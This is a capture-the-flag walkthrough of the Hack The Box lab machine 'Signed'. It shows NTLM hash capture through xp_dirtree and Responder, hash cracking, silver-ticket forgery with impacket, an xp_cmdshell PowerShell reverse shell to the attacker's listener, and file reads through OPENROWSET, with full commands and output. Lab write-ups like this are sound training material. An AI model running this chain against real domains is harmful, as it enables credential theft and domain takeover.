Hack The Box: Signed
Signed is a medium-difficulty Windows machine. We start with provided MSSQL credentials (scott / Sm230#C5NatH) → abuse xp_dirtree + Responder to capture and crack the NetNTLMv2 hash of the service account mssqlsvc (purPLE9795!@) → log in as mssqlsvc → extract the domain SID from the server → forge a silver ticket for the MSSQLSvc SPN as Administrator → enable xp_cmdshell and catch a reverse shell as the service account (user flag) → forge a second silver ticket that puts mssqlsvc in Domain Admins (RID 512) → enable Ad Hoc Distributed Queries and read root.txt with OPENROWSET.
Enumeration
Nmap Scan
┌──(sanke㉿vbox)-[~/Downloads/signed]
└─$ nmap -A -v 10.10.11.90
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-02 12:03 EST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:03
Completed NSE at 12:03, 0.00s elapsed
Initiating NSE at 12:03
Completed NSE at 12:03, 0.00s elapsed
Initiating NSE at 12:03
Completed NSE at 12:03, 0.00s elapsed
Initiating Ping Scan at 12:03
PORT STATE SERVICE VERSION
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
| ms-sql-info:
| 10.10.11.90:1433:
| Version:
| name: Microsoft SQL Server 2022 RTM
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.10.11.90:1433:
| Target_Name: SIGNED
| NetBIOS_Domain_Name: SIGNED
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: SIGNED.HTB
| DNS_Computer_Name: DC01.SIGNED.HTB
| DNS_Tree_Name: SIGNED.HTB
|_ Product_Version: 10.0.17763
|_ssl-date: 2025-11-02T17:04:28+00:00; +6s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-31T04:03:19
| Not valid after: 2055-10-31T04:03:19
| MD5: acad:1cd6:2c88:8c44:af3b:a9f7:cedb:f4d0
|_SHA-1: abbf:bb58:6505:0373:eea2:3d1e:89a9:721b:8cfe:a1e3
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Only one port is open: 1433, Microsoft SQL Server 2022. That makes sense given that the box ships with MSSQL credentials. The ms-sql-ntlm-info script already leaks the domain (SIGNED.HTB) and the hostname (DC01), so the instance is running on a domain controller, which matters later.
┌──(sanke㉿vbox)-[~/Downloads/signed]
└─$ impacket-mssqlclient 'signed.htb/scott'@10.10.11.90
Impacket v0.13.0.dev0+20250422.104055.27bebb13 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (scott guest@master)>
Enumeration as scott turned up nothing useful: the login maps to guest, cannot reconfigure the server, and has no impersonation rights, as the built-in mssqlclient helpers show.
SQL (scott guest@msdb)> enable_xp_cmdshell
ERROR(DC01): Line 105: User does not have permission to perform this action.
ERROR(DC01): Line 1: You do not have permission to run the RECONFIGURE statement.
ERROR(DC01): Line 105: User does not have permission to perform this action.
ERROR(DC01): Line 1: You do not have permission to run the RECONFIGURE statement.
SQL (scott guest@msdb)> enum_users
UserName RoleName LoginName DefDBName DefSchemaName UserID SID
------------------ -------- --------- --------- ------------- ---------- -----
dbo db_owner sa master dbo b'1 ' b'01'
guest public NULL NULL guest b'2 ' b'00'
INFORMATION_SCHEMA public NULL NULL NULL b'3 ' NULL
sys public NULL NULL NULL b'4 ' NULL
SQL (scott guest@msdb)> enum_impersonate
execute as database permission_name state_desc grantee grantor
---------- -------- --------------- ---------- ------- -------
SQL (scott guest@msdb)>
Digging further, xp_dirtree is callable (it is one of the few extended procedures that SQL Server grants to public by default), but pointing it at the target itself returns no rows.
SQL (scott guest@msdb)> xp_dirtree \\10.10.11.90\
subdirectory depth file
------------ ----- ----
SQL (scott guest@msdb)>
That is enough for a well-known trick: when xp_dirtree is given a UNC path, the SQL Server service account itself authenticates to that SMB server, so pointing it at a host running Responder captures the service account's NetNTLMv2 hash. This Medium post describes the technique:
https://duckwrites.medium.com/capture-ntlm-hashes-with-mssql-an-essential-oscp-tip-0c2433a7815a
Exploitation
I started Responder on the VPN interface.
┌──(sanke㉿vbox)-[~/Downloads/signed]
└─$ sudo responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.6.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.16.223]
Responder IPv6 [dead:beef:4::10dd]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
Don't Respond To MDNS TLD ['_DOSVC']
TTL for poisoned response [default]
[+] Current Session Variables:
Responder Machine Name [WIN-43IZNKFYL9O]
Responder Domain Name [7CTK.LOCAL]
Responder DCE-RPC Port [48640]
[+] Listening for events...
Then I called xp_dirtree with a UNC path to my own IP. The share name can be anything, because SQL Server authenticates to the SMB server before it learns that the share does not exist.
SQL (scott guest@msdb)> xp_dirtree \\<YOUR-IP>\a
subdirectory depth file
------------ ----- ----
SQL (scott guest@msdb)>
Back in Responder there is an NTLMv2-SSP hash for the user mssqlsvc, the account the SQL Server service runs as.
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.90
[SMB] NTLMv2-SSP Username : SIGNED\mssqlsvc
[SMB] NTLMv2-SSP Hash : mssqlsvc::SIGNED:c286ee8c7f8e04bd:3A9580905F0427D3EA5EC357810E1DB2:0101000000000000803E2473F84BDC01D4DBA20C4AF70F7900000000020008003700430054004B0001001E00570049004E002D003400330049005A004E004B00460059004C0039004F0004003400570049004E002D003400330049005A004E004B00460059004C0039004F002E003700430054004B002E004C004F00430041004C00030014003700430054004B002E004C004F00430041004C00050014003700430054004B002E004C004F00430041004C0007000800803E2473F84BDC01060004000200000008003000300000000000000000000000003000003A45DC0EA5F3C04F970E4727EBCA7D297958B1B8075F6D50508A57D6927E0C610A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310036002E003200320033000000000000000000
Let's crack it with hashcat. Mode 5600 is NetNTLMv2, and the Responder line can be fed in exactly as captured.
┌──(sanke㉿vbox)-[~/Downloads/signed]
└─$ hashcat -m 5600 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #1: cpu-haswell-AMD Ryzen 5 3600 6-Core Processor, 4301/8666 MB (2048 MB allocatable), 5MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
MSSQLSVC::SIGNED:c286ee8c7f8e04bd:3a9580905f0427d3ea5ec357810e1db2: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
310030002e00310036002e003200320033000000000000000000:purPLE9795!@
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: MSSQLSVC::SIGNED:c286ee8c7f8e04bd:3a9580905f0427d3e...000000
Time.Started.....: Sun Nov 2 13:11:00 2025 (3 secs)
Time.Estimated...: Sun Nov 2 13:11:03 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1858.2 kH/s (1.62ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4490240/14344385 (31.30%)
Rejected.........: 0/4490240 (0.00%)
Restore.Point....: 4485120/14344385 (31.27%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: purdaliza -> punkrocker95
Hardware.Mon.#1..: Util: 25%
Started: Sun Nov 2 13:10:56 2025
Stopped: Sun Nov 2 13:11:04 2025
Let's go!!! The password for mssqlsvc is "purPLE9795!@".
Now we log in to MSSQL again, this time as the domain user, so -windows-auth is required.
┌──(sanke㉿vbox)-[~/Downloads/signed]
└─$ impacket-mssqlclient 'signed.htb/mssqlsvc'@10.10.11.90 -windows-auth
Impacket v0.13.0.dev0+20250422.104055.27bebb13 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (SIGNED\mssqlsvc guest@master)>
Digging around the SQL Server as mssqlsvc turned up nothing new; this login also maps to guest. But we now hold something more useful than a database login: the password of the account that runs the MSSQL service, which is the key that Kerberos service tickets for the MSSQLSvc SPN are encrypted with. That is exactly what a silver ticket needs, so we can forge a service ticket for MSSQLSvc that claims to be Administrator, without ever talking to the KDC. Besides the key, ticketer needs the domain SID, which the SQL Server itself can tell us:
SQL (SIGNED\mssqlsvc guest@msdb)> select SUSER_SID() asa;
asa
-----------------------------------------------------------
b'0105000000000005150000005b7bb0f398aa2245ad4a1ca44f040000'
SQL (SIGNED\mssqlsvc guest@msdb)>
SUSER_SID() returns the caller's SID in binary form: revision (01), sub-authority count (05), a 48-bit big-endian identifier authority (5), then five little-endian 32-bit sub-authorities. Decoded, it is S-1-5-21-4088429403-1159899800-2753317549-1103. The last value, 1103 (0x44f), is the RID of mssqlsvc; everything before it is the domain SID: S-1-5-21-4088429403-1159899800-2753317549.
Now let's forge the silver ticket.
impacket-ticketer -nthash EF699384C3285C54128A3EE1DDB1A0CC\
-domain SIGNED -dc-ip 10.10.11.90 \
-domain-sid S-1-5-21-4088429403-1159899800-2753317549 \
-spn MSSQLSvc/10.10.11.90:1433 \
Administrator
The -nthash value is the NT hash (MD4 of the UTF-16LE encoded password) of purPLE9795!@; with RC4 encryption types that hash is the service key, so ticketer can encrypt and sign a ticket the SQL Server will accept. Note that the invocation as actually run below also passes -groups 1105, so this first ticket carries only that group in its PAC rather than ticketer's default list, which already includes the admin groups.
┌──(sanke㉿vbox)-[~/Downloads/signed]
└─$ impacket-ticketer -nthash EF699384C3285C54128A3EE1DDB1A0CC\
-domain SIGNED -dc-ip 10.10.11.90 \
-domain-sid S-1-5-21-4088429403-1159899800-2753317549 \
-spn MSSQLSvc/10.10.11.90:1433 \
Administrator -groups 1105
Impacket v0.13.0.dev0+20250422.104055.27bebb13 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for SIGNED/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in Administrator.ccache
Now point KRB5CCNAME at the ccache and check it with klist.
┌──(sanke㉿vbox)-[~/Downloads/signed]
└─$ export KRB5CCNAME=Administrator.ccache
┌──(sanke㉿vbox)-[~/Downloads/signed]
└─$ klist -c $KRB5CCNAME
Ticket cache: FILE:Administrator.ccache
Default principal: Administrator@SIGNED
Valid starting Expires Service principal
11/02/2025 14:02:07 10/31/2035 15:02:07 MSSQLSvc/10.10.11.90:1433@SIGNED
renew until 10/31/2035 15:02:07
Let's connect again, this time with Kerberos authentication (-k) as Administrator.
┌──(sanke㉿vbox)-[~/Downloads/signed]
└─$ impacket-mssqlclient -k SIGNED/Administrator@10.10.11.90 -no-pass
Impacket v0.13.0.dev0+20250422.104055.27bebb13 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (SIGNED\Administrator dbo@master)>
The login now maps to dbo, so we can enable xp_cmdshell and spawn a reverse shell. Commands run through xp_cmdshell execute under the SQL Server service account, so the shell we get will be mssqlsvc, not Administrator.
SQL (SIGNED\Administrator dbo@master)> enable_xp_cmdshell
INFO(DC01): Line 196: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
INFO(DC01): Line 196: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL (SIGNED\Administrator dbo@master)>
For the reverse shell I used this gist, a small Python script that generates a base64-encoded PowerShell reverse shell one-liner:
https://gist.github.com/tothi/ab288fb523a4b32b51a53e542d40fe58#file-mkpsrevshell-py
I downloaded the script and ran it with my IP and port.
┌──(sanke㉿vbox)-[~/Downloads/signed]
└─$ python3 rev.py <YOUR-IP> 4444
powershell -e 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
Now we copy the payload and run it through xp_cmdshell on the SQL Server.
SQL (SIGNED\Administrator dbo@master)> xp_cmdshell "powershell -e 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"
On our listener we get a shell as mssqlsvc and the user flag.
┌──(sanke㉿vbox)-[~/Downloads/signed]
└─$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.16.223] from (UNKNOWN) [10.10.11.90] 63510
PS C:\Users\mssqlsvc\Desktop> type user.txt
769ce41ea8005864fe1dd7f677306f63
Privilege Escalation
Since we control the service key, we also control the PAC of any ticket we forge, and the SQL Server trusts the group memberships it finds there. So the next step is a ticket for our real user mssqlsvc (RID 1103) whose PAC claims membership of Domain Admins (RID 512) and Enterprise Admins (RID 519).
ticketer.py -nthash EF699384C3285C54128A3EE1DDB1A0CC -domain-sid S-1-5-21-4088429403-1159899800-2753317549 -domain SIGNED.HTB -spn MSSQLSvc/DC01.SIGNED.HTB -groups 512,519 -user-id 1103 mssqlsvc
With KRB5CCNAME pointing at the new ccache, we reconnect with impacket-mssqlclient -k the same way as before; the prompt now shows mssqlsvc as dbo. What we will do from here is read files on the disk through the database, using Ad Hoc Distributed Queries and OPENROWSET. The target, of course, is root.txt in the Administrator's directory.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'Ad Hoc Distributed Queries', 1;
RECONFIGURE;
The first pair exposes the advanced configuration options, the second enables Ad Hoc Distributed Queries. Two caveats worth knowing: the BULK form of OPENROWSET used below is governed by the ADMINISTER BULK OPERATIONS permission (which sysadmin has) rather than by the Ad Hoc option, so enabling it is harmless but not what actually unlocks the read; and for a Windows login SQL Server accesses the file under that login's own token rather than under the service account, which is why the mssqlsvc shell could not read the Administrator's desktop but a session whose PAC claims Domain Admins can.
Now, using OPENROWSET(BULK ...) with SINGLE_CLOB, we read the file as one text value.
SQL (SIGNED\mssqlsvc dbo@master)> SELECT * FROM OPENROWSET(BULK 'C:\Users\Administrator\Desktop\root.txt', SINGLE_CLOB) as x;
BulkColumn
---------------------------------------
b'520b6f323c34a4331a3a82b80de14982\r\n'
Let's go, we got our root.txt!!!!
What made this machine so different is that the whole path, from foothold to root, went through a single open port, 1433. No SMB, no WinRM, just the SQL Server, one coerced NTLM authentication, and two forged Kerberos tickets. I was surprised!
